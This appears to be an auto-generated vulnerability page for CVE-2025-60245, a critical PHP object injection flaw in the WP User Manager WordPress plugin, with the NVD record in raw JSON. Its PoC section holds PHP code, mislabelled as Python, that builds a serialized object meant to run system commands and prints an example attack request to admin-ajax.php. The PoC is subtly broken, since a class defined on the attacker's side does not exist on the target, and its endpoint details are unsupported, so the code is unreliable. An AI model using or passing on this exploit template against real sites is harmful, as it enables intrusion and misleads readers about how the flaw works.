Security Vulnerability Report
中文
CVE-2025-60245 CVSS 9.8 CRITICAL

CVE-2025-60245

Published: 2025-11-06 16:16:07
Last Modified: 2026-04-15 00:35:42

Description

Deserialization of Untrusted Data vulnerability in WP User Manager WP User Manager wp-user-manager allows Object Injection.This issue affects WP User Manager: from n/a through <= 2.9.12.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WP User Manager <= 2.9.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-60245 PoC - WP User Manager Object Injection * Target: WordPress with WP User Manager plugin <= 2.9.12 * Vulnerability: Deserialization of Untrusted Data * * This PoC demonstrates the object injection vulnerability by: * 1. Creating a malicious serialized payload with a PHP object * 2. Sending the payload to a vulnerable endpoint * * Note: Actual exploitation requires finding suitable gadget classes */ class MaliciousPayload { public $callback; public function __construct() { // Define malicious callback (e.g., system command execution) $this->callback = 'system'; } public function __wakeup() { // Automatically called during deserialization if (isset($this->callback)) { call_user_func($this->callback, 'whoami'); } } } // Generate malicious serialized payload $payload = serialize(new MaliciousPayload()); echo "Malicious Payload: " . $payload . "\n"; // In real attack, this payload would be sent via: // - HTTP POST/GET parameters // - Cookie values // - AJAX requests // - Plugin's REST API endpoints // Example HTTP request structure: $example_request = <<<HTTP POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded action=wum_render_field&field_data={$payload} HTTP; echo "\nExample Request:\n" . $example_request; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60245", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:07.360", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in WP User Manager WP User Manager wp-user-manager allows Object Injection.This issue affects WP User Manager: from n/a through <= 2.9.12."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-user-manager/vulnerability/wordpress-wp-user-manager-plugin-2-9-12-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}